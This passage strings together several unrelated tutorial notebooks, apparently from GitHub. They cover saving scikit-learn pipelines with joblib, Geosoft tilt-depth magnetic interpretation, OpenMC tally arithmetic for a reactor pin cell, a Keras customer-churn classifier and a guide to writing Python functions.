directly. For example, you can save either the model, pipeline or entire ensemble of models from our gridsearch: ``` import joblib joblib.dump(gs.best_estimator_, './pipeline.pkl') # just save the best pipeline joblib.dump(gs, './gridsearch.pkl') # save all the pipelines ``` And then load them back in: ``` gs = joblib.load('./gridsearch.pkl') estimator = joblib.load('./pipeline.pkl') estimator ``` The serialization of trained models and entire pipelines allows the models themselves (and the preprocessing steps) to be effectively reused. ## Beyond A Prototype While we've put things togtether in a Jupyter notebook, eventually you might want to put this workflow together as a function which you might store in a separate `.py` file such that it can be imported and more easily referenced, versioned and adapted.
github_jupyter
Copyright (c) 2018 [Geosoft Inc.](geosoft.com) https://github.com/GeosoftInc/gxpy/blob/master/README.md [BSD 2-clause License](https://github.com/GeosoftInc/gxpy/blob/master/LICENSE) # Tilt Depth The depth to magnetic sources from the edges of magnetic features can be determined from the reciprocal of the gradient of the tilt angle at the zero-crossover. The `geosoft.gxpy.grid_utility.tilt_depth` makes this calculation and returns a set of (x, y, z) locations that represent magnetic depth. Reference: [Salem et al, 2008, Interpretation of magnetic data using tilt-angle derivatives](https://www.researchgate.net/publication/236873389_Interpretation_of_magnetic_data_using_tilt-angle_derivatives) The procedure implemented in Geosoft follows a process developed by Blakely, 2016. 1. [TMI Grid](#TMI-Grid) 2. [Calculate the depth from the tilt-angle and tilt-derivative](#Calculate the depth from the tilt-angle and tilt-derivative) 3. [Plot depths as coloured symbols](#Plot-depths-as-coloured-symbols) ## TMI Grid This is Total Magnetic Intensity (TMI) data from the Black Hills Norite in South Australia. Reference: https://doi.org/10.1071/ASEG2016ab115 ``` import geosoft.gxpy.gx as gx import geosoft.gxpy.utility as gxu import geosoft.gxpy.grid as gxgrd import geosoft.gxpy.grid_utility as gxgrdu import geosoft.gxpy.map as gxmap import geosoft.gxpy.view as gxview import geosoft.gxpy.group as gxgrp import numpy as np from IPython.display import Image gxc = gx.GXpy() gxu.check_version('9.4.0b0') # get the sample data from github url = 'https://github.com/GeosoftInc/gxpy/raw/master/examples/data/' grid = 'bhn_tmi_250m.grd' gxu.url_retrieve(url + grid) gxu.url_retrieve(url + grid + '.gi') gxu.url_retrieve(url + grid + '.xml') grd = gxgrd.Grid.open(grid) Image(grd.image_file(shade=True, pix_width=500)) ``` ## Calculate the depth from the tilt-angle and tilt-derivative The depth is the reciprocal of the horizontal gradient at the zero-contour of the tilt-angle. ``` td_pp = gxgrdu.tilt_depth(grd) ``` ## Plot depths as coloured symbols ``` with gxmap.Map.figure(td_pp.extent_xy, title='Depth from Tilt-Derivative', margins=(1, 3.5, 3, 1)) as gmap: map_file = gmap.file_name with gxview.View.open(gmap, "data") as v: cmap = gxgrp.Color_map(title='depth', unit_of_measure=td_pp.coordinate_system.unit_of_measure) depths = td_pp.pp[:,2] depths = depths[~np.isnan(depths)] cmap.set_linear(np.min(depths), 2000) # np.max(depths)) gxgrp.Color_symbols_group.new(v, 'tilt-depth', td_pp.pp, cmap) gxgrp.legend_color_bar(v, 'depth_legend', cmap=cmap) Image(gxmap.Map.open(map_file).image_file(pix_width=800)) ```
github_jupyter
# Tally Arithmetic This notebook shows the how tallies can be combined (added, subtracted, multiplied, etc.) using the Python API in order to create derived tallies. Since no covariance information is obtained, it is assumed that tallies are completely independent of one another when propagating uncertainties. The target problem is a simple pin cell. ``` import glob from IPython.display import Image import numpy as np import openmc ``` ## Generate Input Files First we need to define materials that will be used in the problem. We'll create three materials for the fuel, water, and cladding of the fuel pin. ``` # 1.6 enriched fuel fuel = openmc.Material(name='1.6% Fuel') fuel.set_density('g/cm3', 10.31341) fuel.add_nuclide('U235', 3.7503e-4) fuel.add_nuclide('U238', 2.2625e-2) fuel.add_nuclide('O16', 4.6007e-2) # borated water water = openmc.Material(name='Borated Water') water.set_density('g/cm3', 0.740582) water.add_nuclide('H1', 4.9457e-2) water.add_nuclide('O16', 2.4732e-2) water.add_nuclide('B10', 8.0042e-6) # zircaloy zircaloy = openmc.Material(name='Zircaloy') zircaloy.set_density('g/cm3', 6.55) zircaloy.add_nuclide('Zr90', 7.2758e-3) ``` With our three materials, we can now create a materials file object that can be exported to an actual XML file. ``` # Instantiate a Materials collection materials_file = openmc.Materials([fuel, water, zircaloy]) # Export to "materials.xml" materials_file.export_to_xml() ``` Now let's move on to the geometry. Our problem will have three regions for the fuel, the clad, and the surrounding coolant. The first step is to create the bounding surfaces -- in this case two cylinders and six planes. ``` # Create cylinders for the fuel and clad fuel_outer_radius = openmc.ZCylinder(x0=0.0, y0=0.0, r=0.39218) clad_outer_radius = openmc.ZCylinder(x0=0.0, y0=0.0, r=0.45720) # Create boundary planes to surround the geometry # Use both reflective and vacuum boundaries to make life interesting min_x = openmc.XPlane(x0=-0.63, boundary_type='reflective') max_x = openmc.XPlane(x0=+0.63, boundary_type='reflective') min_y = openmc.YPlane(y0=-0.63, boundary_type='reflective') max_y = openmc.YPlane(y0=+0.63, boundary_type='reflective') min_z = openmc.ZPlane(z0=-100., boundary_type='vacuum') max_z = openmc.ZPlane(z0=+100., boundary_type='vacuum') ``` With the surfaces defined, we can now create cells that are defined by intersections of half-spaces created by the surfaces. ``` # Create a Universe to encapsulate a fuel pin pin_cell_universe = openmc.Universe(name='1.6% Fuel Pin') # Create fuel Cell fuel_cell = openmc.Cell(name='1.6% Fuel') fuel_cell.fill = fuel fuel_cell.region = -fuel_outer_radius pin_cell_universe.add_cell(fuel_cell) # Create a clad Cell clad_cell = openmc.Cell(name='1.6% Clad') clad_cell.fill = zircaloy clad_cell.region = +fuel_outer_radius & -clad_outer_radius pin_cell_universe.add_cell(clad_cell) # Create a moderator Cell moderator_cell = openmc.Cell(name='1.6% Moderator') moderator_cell.fill = water moderator_cell.region = +clad_outer_radius pin_cell_universe.add_cell(moderator_cell) ``` OpenMC requires that there is a "root" universe. Let us create a root cell that is filled by the pin cell universe and then assign it to the root universe. ``` # Create root Cell root_cell = openmc.Cell(name='root cell') root_cell.fill = pin_cell_universe # Add boundary planes root_cell.region = +min_x & -max_x & +min_y & -max_y & +min_z & -max_z # Create root Universe root_universe = openmc.Universe(universe_id=0, name='root universe') root_universe.add_cell(root_cell) ``` We now must create a geometry that is assigned a root universe, put the geometry into a geometry file, and export it to XML. ``` # Create Geometry and set root Universe geometry = openmc.Geometry(root_universe) # Export to "geometry.xml" geometry.export_to_xml() ``` With the geometry and materials finished, we now just need to define simulation parameters. In this case, we will use 5 inactive batches and 15 active batches each with 2500 particles. ``` # OpenMC simulation parameters batches = 20 inactive = 5 particles = 2500 # Instantiate a Settings object settings_file = openmc.Settings() settings_file.batches = batches settings_file.inactive = inactive settings_file.particles = particles settings_file.output = {'tallies': True} # Create an initial uniform spatial source distribution over fissionable zones bounds = [-0.63, -0.63, -100., 0.63, 0.63, 100.] uniform_dist = openmc.stats.Box(bounds[:3], bounds[3:], only_fissionable=True) settings_file.source = openmc.Source(space=uniform_dist) # Export to "settings.xml" settings_file.export_to_xml() ``` Let us also create a plot file that we can use to verify that our pin cell geometry was created successfully. ``` # Instantiate a Plot plot = openmc.Plot(plot_id=1) plot.filename = 'materials-xy' plot.origin = [0, 0, 0] plot.width = [1.26, 1.26] plot.pixels = [250, 250] plot.color_by = 'material' # Show plot openmc.plot_inline(plot) ``` As we can see from the plot, we have a nice pin cell with fuel, cladding, and water! Before we run our simulation, we need to tell the code what we want to tally. The following code shows how to create a variety of tallies. ``` # Instantiate an empty Tallies object tallies_file = openmc.Tallies() # Create Tallies to compute microscopic multi-group cross-sections # Instantiate energy filter for multi-group cross-section Tallies energy_filter = openmc.EnergyFilter([0., 0.625, 20.0e6]) # Instantiate flux Tally in moderator and fuel tally = openmc.Tally(name='flux') tally.filters = [openmc.CellFilter([fuel_cell, moderator_cell])] tally.filters.append(energy_filter) tally.scores = ['flux'] tallies_file.append(tally) # Instantiate reaction rate Tally in fuel tally = openmc.Tally(name='fuel rxn rates') tally.filters = [openmc.CellFilter(fuel_cell)] tally.filters.append(energy_filter) tally.scores = ['nu-fission', 'scatter'] tally.nuclides = ['U238', 'U235'] tallies_file.append(tally) # Instantiate reaction rate Tally in moderator tally = openmc.Tally(name='moderator rxn rates') tally.filters = [openmc.CellFilter(moderator_cell)] tally.filters.append(energy_filter) tally.scores = ['absorption', 'total'] tally.nuclides = ['O16', 'H1'] tallies_file.append(tally) # Instantiate a tally mesh mesh = openmc.RegularMesh(mesh_id=1) mesh.dimension = [1, 1, 1] mesh.lower_left = [-0.63, -0.63, -100.] mesh.width = [1.26, 1.26, 200.] meshsurface_filter = openmc.MeshSurfaceFilter(mesh) # Instantiate thermal, fast, and total leakage tallies leak = openmc.Tally(name='leakage') leak.filters = [meshsurface_filter] leak.scores = ['current'] tallies_file.append(leak) thermal_leak = openmc.Tally(name='thermal leakage') thermal_leak.filters = [meshsurface_filter, openmc.EnergyFilter([0., 0.625])] thermal_leak.scores = ['current'] tallies_file.append(thermal_leak) fast_leak = openmc.Tally(name='fast leakage') fast_leak.filters = [meshsurface_filter, openmc.EnergyFilter([0.625, 20.0e6])] fast_leak.scores = ['current'] tallies_file.append(fast_leak) # K-Eigenvalue (infinity) tallies fiss_rate = openmc.Tally(name='fiss. rate') abs_rate = openmc.Tally(name='abs. rate') fiss_rate.scores = ['nu-fission'] abs_rate.scores = ['absorption'] tallies_file += (fiss_rate, abs_rate) # Resonance Escape Probability tallies therm_abs_rate = openmc.Tally(name='therm. abs. rate') therm_abs_rate.scores = ['absorption'] therm_abs_rate.filters = [openmc.EnergyFilter([0., 0.625])] tallies_file.append(therm_abs_rate) # Thermal Flux Utilization tallies fuel_therm_abs_rate = openmc.Tally(name='fuel therm. abs. rate') fuel_therm_abs_rate.scores = ['absorption'] fuel_therm_abs_rate.filters = [openmc.EnergyFilter([0., 0.625]), openmc.CellFilter([fuel_cell])] tallies_file.append(fuel_therm_abs_rate) # Fast Fission Factor tallies therm_fiss_rate = openmc.Tally(name='therm. fiss. rate') therm_fiss_rate.scores = ['nu-fission'] therm_fiss_rate.filters = [openmc.EnergyFilter([0., 0.625])] tallies_file.append(therm_fiss_rate) # Instantiate energy filter to illustrate Tally slicing fine_energy_filter = openmc.EnergyFilter(np.logspace(np.log10(1e-2), np.log10(20.0e6), 10)) # Instantiate flux Tally in moderator and fuel tally = openmc.Tally(name='need-to-slice') tally.filters = [openmc.CellFilter([fuel_cell, moderator_cell])] tally.filters.append(fine_energy_filter) tally.scores = ['nu-fission', 'scatter'] tally.nuclides = ['H1', 'U238'] tallies_file.append(tally) # Export to "tallies.xml" tallies_file.export_to_xml() ``` Now we a have a complete set of inputs, so we can go ahead and run our simulation. ``` # Run OpenMC! openmc.run() ``` ## Tally Data Processing Our simulation ran successfully and created a statepoint file with all the tally data in it. We begin our analysis here loading the statepoint file and 'reading' the results. By default, the tally results are not read into memory because they might be large, even large enough to exceed the available memory on a computer. ``` # Load the statepoint file sp = openmc.StatePoint('statepoint.20.h5') ``` We have a tally of the total fission rate and the total absorption rate, so we can calculate k-eff as: $$k_{eff} = \frac{\langle \nu \Sigma_f \phi \rangle}{\langle \Sigma_a \phi \rangle + \langle L \rangle}$$ In this notation, $\langle \cdot \rangle^a_b$ represents an OpenMC that is integrated over region $a$ and energy range $b$. If $a$ or $b$ is not reported, it means the value represents an integral over all space or all energy, respectively. ``` # Get the fission and absorption rate tallies fiss_rate = sp.get_tally(name='fiss. rate') abs_rate = sp.get_tally(name='abs. rate') # Get the leakage tally leak = sp.get_tally(name='leakage') leak = leak.summation(filter_type=openmc.MeshSurfaceFilter, remove_filter=True) # Compute k-infinity using tally arithmetic keff = fiss_rate / (abs_rate + leak) keff.get_pandas_dataframe() ``` Notice that even though the neutron production rate, absorption rate, and current are separate tallies, we still get a first-order estimate of the uncertainty on the quotient of them automatically! Often in textbooks you'll see k-eff represented using the six-factor formula $$k_{eff} = p \epsilon f \eta P_{FNL} P_{TNL}.$$ Let's analyze each of these factors, starting with the resonance escape probability which is defined as $$p=\frac{\langle\Sigma_a\phi\rangle_T + \langle L \rangle_T}{\langle\Sigma_a\phi\rangle + \langle L \rangle_T}$$ where the subscript $T$ means thermal energies. ``` # Compute resonance escape probability using tally arithmetic therm_abs_rate = sp.get_tally(name='therm. abs. rate') thermal_leak = sp.get_tally(name='thermal leakage') thermal_leak = thermal_leak.summation(filter_type=openmc.MeshSurfaceFilter, remove_filter=True) res_esc = (therm_abs_rate + thermal_leak) / (abs_rate + thermal_leak) res_esc.get_pandas_dataframe() ``` The fast fission factor can be calculated as $$\epsilon=\frac{\langle\nu\Sigma_f\phi\rangle}{\langle\nu\Sigma_f\phi\rangle_T}$$ ``` # Compute fast fission factor factor using tally arithmetic therm_fiss_rate = sp.get_tally(name='therm. fiss. rate') fast_fiss = fiss_rate / therm_fiss_rate fast_fiss.get_pandas_dataframe() ``` The thermal flux utilization is calculated as $$f=\frac{\langle\Sigma_a\phi\rangle^F_T}{\langle\Sigma_a\phi\rangle_T}$$ where the superscript $F$ denotes fuel. ``` # Compute thermal flux utilization factor using tally arithmetic fuel_therm_abs_rate = sp.get_tally(name='fuel therm. abs. rate') therm_util = fuel_therm_abs_rate / therm_abs_rate therm_util.get_pandas_dataframe() ``` The next factor is the number of fission neutrons produced per absorption in fuel, calculated as $$\eta = \frac{\langle \nu\Sigma_f\phi \rangle_T}{\langle \Sigma_a \phi \rangle^F_T}$$ ``` # Compute neutrons produced per absorption (eta) using tally arithmetic eta = therm_fiss_rate / fuel_therm_abs_rate eta.get_pandas_dataframe() ``` There are two leakage factors to account for fast and thermal leakage. The fast non-leakage probability is computed as $$P_{FNL} = \frac{\langle \Sigma_a\phi \rangle + \langle L \rangle_T}{\langle \Sigma_a \phi \rangle + \langle L \rangle}$$ ``` p_fnl = (abs_rate + thermal_leak) / (abs_rate + leak) p_fnl.get_pandas_dataframe() ``` The final factor is the thermal non-leakage probability and is computed as $$P_{TNL} = \frac{\langle \Sigma_a\phi \rangle_T}{\langle \Sigma_a \phi \rangle_T + \langle L \rangle_T}$$ ``` p_tnl = therm_abs_rate / (therm_abs_rate + thermal_leak) p_tnl.get_pandas_dataframe() ``` Now we can calculate $k_{eff}$ using the product of the factors form the four-factor formula. ``` keff = res_esc * fast_fiss * therm_util * eta * p_fnl * p_tnl keff.get_pandas_dataframe() ``` We see that the value we've obtained here has exactly the same mean as before. However, because of the way it was calculated, the standard deviation appears to be larger. Let's move on to a more complicated example now. Before we set up tallies to get reaction rates in the fuel and moderator in two energy groups for two different nuclides. We can use tally arithmetic to divide each of these reaction rates by the flux to get microscopic multi-group cross sections. ``` # Compute microscopic multi-group cross-sections flux = sp.get_tally(name='flux') flux = flux.get_slice(filters=[openmc.CellFilter], filter_bins=[(fuel_cell.id,)]) fuel_rxn_rates = sp.get_tally(name='fuel rxn rates') mod_rxn_rates = sp.get_tally(name='moderator rxn rates') fuel_xs = fuel_rxn_rates / flux fuel_xs.get_pandas_dataframe() ``` We see that when the two tallies with multiple bins were divided, the derived tally contains the outer product of the combinations. If the filters/scores are the same, no outer product is needed. The `get_values(...)` method allows us to obtain a subset of tally scores. In the following example, we obtain just the neutron production microscopic cross sections. ``` # Show how to use Tally.get_values(...) with a CrossScore nu_fiss_xs = fuel_xs.get_values(scores=['(nu-fission / flux)']) print(nu_fiss_xs) ``` The same idea can be used not only for scores but also for filters and nuclides. ``` # Show how to use Tally.get_values(...) with a CrossScore and CrossNuclide u235_scatter_xs = fuel_xs.get_values(nuclides=['(U235 / total)'], scores=['(scatter / flux)']) print(u235_scatter_xs) # Show how to use Tally.get_values(...) with a CrossFilter and CrossScore fast_scatter_xs = fuel_xs.get_values(filters=[openmc.EnergyFilter], filter_bins=[((0.625, 20.0e6),)], scores=['(scatter / flux)']) print(fast_scatter_xs) ``` A more advanced method is to use `get_slice(...)` to create a new derived tally that is a subset of an existing tally. This has the benefit that we can use `get_pandas_dataframe()` to see the tallies in a more human-readable format. ``` # "Slice" the nu-fission data into a new derived Tally nu_fission_rates = fuel_rxn_rates.get_slice(scores=['nu-fission']) nu_fission_rates.get_pandas_dataframe() # "Slice" the H-1 scatter data in the moderator Cell into a new derived Tally need_to_slice = sp.get_tally(name='need-to-slice') slice_test = need_to_slice.get_slice(scores=['scatter'], nuclides=['H1'], filters=[openmc.CellFilter], filter_bins=[(moderator_cell.id,)]) slice_test.get_pandas_dataframe() ```
github_jupyter
# Artificial Neural Network in Python with Keras In this program we construct an Artificial Neuron Network model. The aim is to build a classification model to predict if a certain customer will leave the bank services in the six months. **Dataset Description** For this problem we have a Dataset composed by 10000 instances (rows) and 14 features (columns). As the objective is to predict the probability of a client will leave the bank service, in our dataset the last column corresponds to the response. The others columns are the features (independent variables) that we consider to build and training the model, these columns are: RowNumber, CustomerId, Surname, CreditScore, Geography, Gender, Age, Tenure, Balance, NumOfProducts, HasCrCard, IsActiveMember, EstimatedSalary, Exited. ## Importing Libraries ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns ``` ## Importing the Dataset ``` dataset = pd.read_csv('Churn_Modelling.csv') dataset.head() ``` ### Visualizing the categorical variables ``` dataset['Gender'].value_counts() dataset['Gender'].value_counts().plot.bar() dataset.Geography.value_counts() dataset.Geography.value_counts().plot.bar() ``` ### Visualizing the Numerical Variables ``` dataset['Age'].hist(bins=10) dataset.dtypes sns.pairplot(dataset, hue = 'Exited', vars = ['CreditScore', 'Age', 'Balance', 'EstimatedSalary'] ) ``` ### Correlation with the response variable ``` dataset_n = dataset.drop(columns=['RowNumber', 'CustomerId', 'Surname', 'Geography', 'Gender', 'Tenure', 'NumOfProducts', 'HasCrCard', 'IsActiveMember', 'Exited']) dataset_n.corrwith(dataset.Exited).plot.bar( figsize = (20, 10), title = "Correlation with Exited", fontsize = 15, rot = 45, grid = True) ``` ### Correlation Between Numerical Variables ``` ## Correlation Matrix sns.set(style="white") # Compute the correlation matrix corr = dataset_n.corr() # Generate a mask for the upper triangle mask = np.zeros_like(corr, dtype=np.bool) mask[np.triu_indices_from(mask)] = True # Set up the matplotlib figure f, ax = plt.subplots(figsize=(10, 20)) # Generate a custom diverging colormap cmap = sns.diverging_palette(220, 10, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.1, center=0, square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot = True) ``` ### Feature Engineering ``` sns.histplot(data=dataset, x='Age', hue='Exited', kde = True) sns.histplot(data=dataset[dataset['Exited'] == 1], x='Age', hue='Exited', bins = 7, kde = True) sns.histplot(data=dataset[dataset['Exited'] == 0], x='Age', hue='Exited', bins = 6, kde = True) def category_age(Age): if (Age <=28): return 0 elif(Age > 28) & (Age <= 38): return 1 elif(Age > 38) & (Age <= 58): return 2 #elif(Age > 40) & (Age <= 50): # return 3 #elif(Age > 50) & (Age <= 60): # return 4 else: return 3 #dataset['Age'] = dataset['Age'].map(category_age) dataset[dataset['Exited'] == 1]['Age'].value_counts() sns.histplot(data=dataset[dataset['Exited'] == 1], x='Age', hue='Exited', kde = True) dataset.columns ``` ### Excluding not important columns ``` dataset = dataset.drop(columns=['RowNumber', 'CustomerId', 'Surname']) ``` ### Encoding Categorical Data ``` dataset['Gender'] = dataset['Gender'].astype('category').cat.codes ``` ### One Hot Econding ``` dataset = pd.get_dummies(dataset) dataset.head() response = dataset['Exited'] dataset = dataset.drop(columns=['Exited']) response.head() ``` ### Splitting the Dataset into train and test set ``` from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(dataset, response, test_size = 0.2, random_state = 0) ``` ### Feature Scaling In almost ANN models we must to apply feature scale. ``` from sklearn.preprocessing import StandardScaler sc_X = StandardScaler() X_train_bckp = pd.DataFrame(sc_X.fit_transform(X_train)) X_test_bckp = pd.DataFrame(sc_X.transform(X_test)) X_train_bckp.columns = X_train.columns.values X_test_bckp.columns = X_test.columns.values X_train_bckp.index = X_train.index.values X_test_bckp.index = X_test.index.values X_train = X_train_bckp X_test = X_test_bckp ``` ## Building the Neural Networks EXPLAIN IN MORE DETAIL WHAT IS AN ANN, WHICH STEP WE NEED AND SO ON ### Importing the Keras library ``` import keras from keras.models import Sequential # To initialize the ANN from keras.layers import Dense # To creat the hidden layers ``` ### Initiating the ANN ``` classifier = Sequential() # To initiate the ANN ``` ### Creating the Layers ``` classifier.add(Dense(units=6, activation='relu', kernel_initializer= 'uniform', input_dim=X_train.shape[1])) # Creating the hidden layer classifier.add(Dense(units=6, activation='relu', kernel_initializer= 'uniform')) # Creating the hidden layer classifier.add(Dense(units=1, activation='sigmoid', kernel_initializer= 'uniform')) # Creating the hidden layer ``` ### Compiling the ANN ``` classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) ``` ## Training the ANN ``` classifier.fit(X_train, y_train, batch_size=32, epochs=100) ``` ### Predicting a New Result ``` y_pred = classifier.predict(X_test) y_pred = (y_pred > 0.5) ``` ### Making the Confusion Matrix ``` from sklearn.metrics import confusion_matrix, accuracy_score cm = confusion_matrix(y_test, y_pred) print(cm) accuracy_score(y_test, y_pred) score_train = classifier.evaluate(X_train, y_train) score_test = classifier.evaluate(X_test, y_test) print(score_train) print(score_test) ``` ## Evaluating the model Here we are going to proceed with a k-fold cross validation. We need to create a new function. def build_classifier(optimizer='adam'): classifier = Sequential() classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu', input_dim = X.shape[1])) classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu')) classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid')) classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics = ['accuracy']) return classifier ### K-Fold Cross Validation from keras.wrappers.scikit_learn import KerasClassifier from sklearn.model_selection import cross_val_score classifier = KerasClassifier(build_fn = build_classifier, batch_size = 32, epochs = 100) accuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10, n_jobs = -1) mean = accuracies.mean() variance = accuracies.std() print(mean) print(variance) ## Tuning the Model from sklearn.model_selection import GridSearchCV classifier = KerasClassifier(build_fn = build_classifier) parameters = {'batch_size': [8, 16, 32, 64], 'epochs': [100, 500], 'optimizer': ['adam', 'rmsprop']} grid_search = GridSearchCV(estimator = classifier, param_grid = parameters, scoring = 'accuracy', cv = 10, n_jobs = -1) grid_search = grid_search.fit(X_train, y_train) best_parameters = grid_search.best_params_ best_accuracy = grid_search.best_score_ print(best_parameters) best_accuracy
github_jupyter
# Writing Functions in Python **by [Richard W. Evans](https://sites.google.com/site/rickecon/), June 2019** Python has many [built-in functions](https://docs.python.org/3/library/functions.html). Functions are objects that accept a specific set of inputs, perform operations on those inputs, and return a set of outputs based on those inputs. Python is a language that focuses on functions. Further, the importing of packages expands the set of functions available to the user. In this notebook, we learn the basics of writing a function in Python, some best practices about docstrings and documentation, and some of the art of using functions to make your code modular. **Modularity** of code is the principle of writing functions for operations that occur multiple times so that a change to that operation only has to be changed once in the code rather than in every instance of the operation. Furthermore, the principle of code modularity also make it easier to take pieces of your code and plug them into other projects as well as combining other projects with your code. ## 1. The form of a Python function You can define a function in a Python module or script by using the `def` keyword followed by the function name, a parenthesized list of inputs, and a colon `:`. You then include the operations you want your function to perform by typing lines of executable code, each of which begins with an indent of four spaces. Finally, if you want your function to return any objects, those objects are listed in a comma-separated list following the `return` keyword as the last indented line of the function. The following function concatenates two strings into one string. ``` def string2together(str1, str2): ''' -------------------------------------------------------------------- This function concatenates two strings as one string with a space separating them. -------------------------------------------------------------------- INPUTS: str1 = string, first string argument passed into function str2 = string, second string argument passed into function OTHER FUNCTIONS AND FILES CALLED BY THIS FUNCTION: None OBJECTS CREATED WITHIN THIS FUNCTION: big_string = string, combination of str1 and str2 with a space between them FILES CREATED BY THIS FUNCTION: None RETURNS: big_string -------------------------------------------------------------------- ''' big_string = str1 + ' ' + str2 return big_string myfirstname = "Rick" mylastname = "Evans" fullname = string2together(myfirstname, mylastname) fullname ``` Note first how extensive the documentation is for this function. The function `string2together` has only two lines of executable code in it. The rest is docstring. We will talk about docstrings and commenting more in Section 3 of this notebook. Also note that we could have written that function `string2together` with only one line of executable code by combining the two lines in the following way: `return str1 + ' ' + str2`. It is best to keep the return statement clean by only returning objects that have already been created in the body of the function. This makes the function's operation more accessible and transparent. Note that, despite the simplicity, this function would be extremely valuable if it were used multiple times in a bigger set of operations. Imagine a process that concatenated two strings with a space in between many times. Now assume you wanted to change some of those instances to be reversed order with a comma separating them. This could be done quickly by changing the one instance of this function rather than each time the operation is called. More on this in Section 4 on modularity. ## 2. Some Python function workflows ### 2.1 Modules and scripts This approach separates the top-level operations (such as the declaration of exogenous parameter values or analysis of results) from the operations that generate the results. In this approach all declaration of parameter values and final analysis of results is done in a Python script (e.g., `script.py`). The script has no function definitions. It only calls the functions it must use from the module. The module is a Python script (e.g., `module.py`) that does not execute any operations on its own. The module is simply a collection of function definitions that can be imported into other scripts or modules. The following pseudocode is an example of a script. ```python import whateverlibraries as wel import module as mod ... # Declare parameter values and any other stuff ... # Call some functions from module.py val1 = md.func1(val2, val3) val4 = md.func2(val5, val1) ``` The module `module.py` has at least two functions defined in it: `func1` and `func2`. By having these functions imported from the module, they can be differentiated by the `md.` prefix from other functions from other modules or from the script itself that might have the same name. ### 2.2 Scripts with "if __name__ == '__main__':" Suppose you write a module that has in it only functions. You can place the `if __name__ == '__main__':` construct at the end of the module, and every command indented underneath it will execute when the module is run as a script. `'__main__'` is the name of the scope in which top-level code executes. ```python # This code is part of a module entitled 'module1.py' def simplesum(val1, val2): the_sum = val1 + val2 return the_sum if __name__ == "__main__": # execute only if run as a script myheight = 5.9 mydadsheight = 6.0 tot_height = simplesum(myheight, mydadsheight) ``` You could execute the code that calculates the variable `tot_height` by running `module1.py` as a script (typing `python module1.py` from the terminal or `run module1.py` from ipython). This method is often prefered to having functions and executable script lines in the same function as is described in Section 2.3. The reason is that, in this method using the `if __name__ == '__main__':` construct, all the commands are inside of functions. ### 2.3 Functions and executable commands in script You can declare functions and run executable lines outside of functions in the same script. This is commonly done in small projects, although many developers feel that following the method from Section 2.2 is a better practice. ``` import numpy as np # Declare parameters myheight = 5.9 mydadsheight = 6.0 def simplesum(val1, val2): the_sum = val1 + val2 return the_sum tot_height = simplesum(myheight, mydadsheight) tot_height ``` ## 3. Function documentation Every function should be well documented. The form of exact function docstrings has not yet been fully regularized in the Python community, but some key principles apply. It is ideal to give carefully organized and easily accessible information in your docstrings and in-line comments such that an outside user can quickly understand what your function is doing. Good documentation can save you time in the long-run (but almost certainly not in the short run) by giving a nice roadmap for debugging code later on if a problem arises. Furthermore, you might sometimes forget what you were originally trying to do with a particular piece of code, and the documentation will remind you. Lastly, well-documented code is essential for other researchers to be able to collaborate with you. Comments in the code are descriptive lines that are not executed by the interpreter. You can comment code in three ways. Brackets of three double quotes `""" """` or brackets of three single quotes `''' '''` will comment out large blocks of text. The pound sign `#` will comment out a single line of text or a partial line of text. ``` print(3 + 7) # print("You're not the best!") print("You're the best!") ''' In the following code snippet, I will print out what most other people think of me. But I might want to change it by uncommenting and commenting out particular lines. ''' print("You're the best.") # print("You're not the best.") ``` ### 3.1 The function docstring The function docstring is a block of text commented out by three bracketing quotes `''' '''` or `""" """`. Docstrings that immediately follow a function are often brought up as the automatic function help or description in advanced text editors and ipython development environments (IDEs). As such, the docstring is an essential description and roadmap for a function. Below is an example of a function that takes as an input a scalar that represents the number of seconds some procedure took. ``` def print_time(seconds, type): ''' -------------------------------------------------------------------- Takes a total amount of time in seconds and prints it in terms of more readable units (days, hours, minutes, seconds) -------------------------------------------------------------------- INPUTS: seconds = scalar > 0, total amount of seconds type = string, description of the type of computation OTHER FUNCTIONS AND FILES CALLED BY THIS FUNCTION: OBJECTS CREATED WITHIN FUNCTION: secs = scalar > 0, remainder number of seconds mins = integer >= 1, remainder number of minutes hrs = integer >= 1, remainder number of hours days = integer >= 1, number of days FILES CREATED BY THIS FUNCTION: None RETURNS: Nothing -------------------------------------------------------------------- ''' if seconds < 60: # seconds secs = round(seconds, 4) print(type + ' computation time: ' + str(secs) + ' sec') elif seconds >= 60 and seconds < 3600: # minutes mins = int(seconds / 60) secs = round(((seconds / 60) - mins) * 60, 1) print(type + ' computation time: ' + str(mins) + ' min, ' + str(secs) + ' sec') elif seconds >= 3600 and seconds < 86400: # hours hrs = int(seconds / 3600) mins = int(((seconds / 3600) - hrs) * 60) secs = round(((seconds / 60) - hrs * 60 - mins) * 60, 1) print(type + ' computation time: ' + str(hrs) + ' hrs, ' + str(mins) + ' min, ' + str(secs) + ' sec') elif seconds >= 86400: # days days = int(seconds / 86400) hrs = int(((seconds / 86400) - days) * 24) mins = int(((seconds / 3600) - days * 24 - hrs) * 60) secs = round( ((seconds / 60) - days * 24 * 60 - hrs * 60 - mins) * 60, 1) print(type + ' computation time: ' + str(days) + ' days, ' + str(hrs) + ' hrs, ' + str(mins) + ' min, ' + str(secs) + ' sec') print_time(98765, 'Simulation') ``` Notice the docstring after the definition line of the function. It starts out with a general description of what the function does. Then it describes the inputs to the function, any other functions that this function calls, any objects created by this function, any files saved by this function, and the objects that the function returns. In this case, the function does not return any objects. It just prints output to the terminal. You will also notice the in-line comments after each `if` statement. These comments describe what particular sections of the code are doing. ### 3.2 In-line comments You see examples of in-line comments in the `print_time()` function above. In-line comments can be helpful for describing the flow of operations or logic within a function. They act as road signs along the way to a functions completion. ## 4. Function modularity A principle in writing Python code is to make functions for each piece that gets used multiple times. This is where the art of good code writing is evident. Here are some questions that the developer must answer. 1. How many times must an operation be repeated before it merits its own function? 2. How complicated must an operation be to merit its own function? 3. Which groups of operations are best grouped together as functions? ## 5. Lambda functions The keyword `lambda` is a shortcut for creating one-line functions in Python. ``` f = lambda x: 6 * (x ** 3) + 4 * (x ** 2) - x + 3 